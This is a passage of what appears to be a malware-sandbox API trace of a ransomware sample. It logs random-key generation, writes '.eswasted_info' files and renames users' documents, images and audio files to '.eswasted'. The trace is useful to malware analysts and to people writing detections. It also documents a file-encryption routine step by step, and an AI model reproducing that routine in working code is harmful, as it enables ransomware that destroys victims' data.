dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0072.668] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0072.670] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.671] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.671] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.671] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.672] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.672] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.680] SetEndOfFile (hFile=0x110) returned 1 [0072.682] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.682] CloseHandle (hObject=0x110) returned 1 [0072.684] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.684] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.684] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.684] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.684] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rp_7KMG.wav") returned 53 [0072.685] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x274) returned 0x4ebff0 [0072.685] lstrcpyW (in: lpString1=0x4ec05a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.685] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.685] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.685] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.685] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rp_7KMG.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rp_7kmg.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.705] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.706] SetEndOfFile (hFile=0xfc) returned 1 [0072.706] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.706] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.706] lstrcpyW (in: lpString1=0x4ec05a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rp_7KMG.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rp_7kmg.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rp_7KMG.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rp_7kmg.wav.eswasted")) returned 1 [0072.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rp_7KMG.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rp_7kmg.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.707] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0072.708] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.709] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.709] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.709] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.710] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.710] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.718] SetEndOfFile (hFile=0xfc) returned 1 [0072.720] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.720] CloseHandle (hObject=0xfc) returned 1 [0072.722] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.722] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.722] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.722] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.722] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vTjo9I6fqkltttXVZ1R.jpg") returned 65 [0072.722] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28c) returned 0x4ebff0 [0072.722] lstrcpyW (in: lpString1=0x4ec072, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.722] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.722] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.723] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.723] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.723] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vTjo9I6fqkltttXVZ1R.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vtjo9i6fqkltttxvz1r.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.724] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.725] SetEndOfFile (hFile=0xfc) returned 1 [0072.725] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.725] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.725] lstrcpyW (in: lpString1=0x4ec072, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vTjo9I6fqkltttXVZ1R.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vtjo9i6fqkltttxvz1r.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vTjo9I6fqkltttXVZ1R.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vtjo9i6fqkltttxvz1r.jpg.eswasted")) returned 1 [0072.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vTjo9I6fqkltttXVZ1R.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vtjo9i6fqkltttxvz1r.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.726] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.727] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.728] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.728] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.728] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.729] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.729] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.737] SetEndOfFile (hFile=0xfc) returned 1 [0072.770] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.770] CloseHandle (hObject=0xfc) returned 1 [0072.771] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.772] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.772] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.772] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z3Ia_egNDWDuz4P.wav") returned 61 [0072.772] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x284) returned 0x4ebff0 [0072.772] lstrcpyW (in: lpString1=0x4ec06a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.772] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.772] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.773] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.773] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.773] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z3Ia_egNDWDuz4P.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z3ia_egndwduz4p.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.774] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.775] SetEndOfFile (hFile=0xfc) returned 1 [0072.775] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.775] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.775] lstrcpyW (in: lpString1=0x4ec06a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z3Ia_egNDWDuz4P.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z3ia_egndwduz4p.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z3Ia_egNDWDuz4P.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z3ia_egndwduz4p.wav.eswasted")) returned 1 [0072.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z3Ia_egNDWDuz4P.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z3ia_egndwduz4p.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.776] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0072.777] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.778] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.778] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.778] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.779] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.779] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.787] SetEndOfFile (hFile=0xfc) returned 1 [0072.789] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.789] CloseHandle (hObject=0xfc) returned 1 [0072.790] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.790] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.791] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.791] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5f3cIDmwpegYMoeV.xlsx") returned 65 [0072.791] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28c) returned 0x4ebff0 [0072.791] lstrcpyW (in: lpString1=0x4ec072, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.791] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.791] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.792] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.792] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5f3cIDmwpegYMoeV.xlsx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5f3cidmwpegymoev.xlsx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.793] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.794] SetEndOfFile (hFile=0xfc) returned 1 [0072.794] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.794] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.794] lstrcpyW (in: lpString1=0x4ec072, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.794] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5f3cIDmwpegYMoeV.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5f3cidmwpegymoev.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5f3cIDmwpegYMoeV.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5f3cidmwpegymoev.xlsx.eswasted")) returned 1 [0072.794] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5f3cIDmwpegYMoeV.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5f3cidmwpegymoev.xlsx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.795] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0072.796] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.797] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.797] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.797] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.797] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.797] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.827] SetEndOfFile (hFile=0xfc) returned 1 [0072.829] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.829] CloseHandle (hObject=0xfc) returned 1 [0072.831] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.831] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.831] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.831] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.831] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\A8m59fmT1-iSxnpmd.ots") returned 80 [0072.831] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2aa) returned 0x4f5f48 [0072.832] lstrcpyW (in: lpString1=0x4f5fe8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.832] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0072.832] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.832] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0072.832] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\A8m59fmT1-iSxnpmd.ots.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\a8m59fmt1-isxnpmd.ots.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.834] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.835] SetEndOfFile (hFile=0xfc) returned 1 [0072.835] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.835] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.835] lstrcpyW (in: lpString1=0x4f5fe8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\A8m59fmT1-iSxnpmd.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\a8m59fmt1-isxnpmd.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\A8m59fmT1-iSxnpmd.ots.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\a8m59fmt1-isxnpmd.ots.eswasted")) returned 1 [0072.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\A8m59fmT1-iSxnpmd.ots.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\a8m59fmt1-isxnpmd.ots.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.836] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.836] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.837] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.837] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.837] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.838] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.838] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.846] SetEndOfFile (hFile=0xfc) returned 1 [0072.848] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.848] CloseHandle (hObject=0xfc) returned 1 [0072.849] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f5f48 | out: hHeap=0x4a0000) returned 1 [0072.849] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.850] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.850] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\Aw8JE.odt") returned 68 [0072.850] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x292) returned 0x4ebff0 [0072.850] lstrcpyW (in: lpString1=0x4ec078, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.850] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0072.850] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.851] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0072.851] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\Aw8JE.odt.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\aw8je.odt.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.851] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, 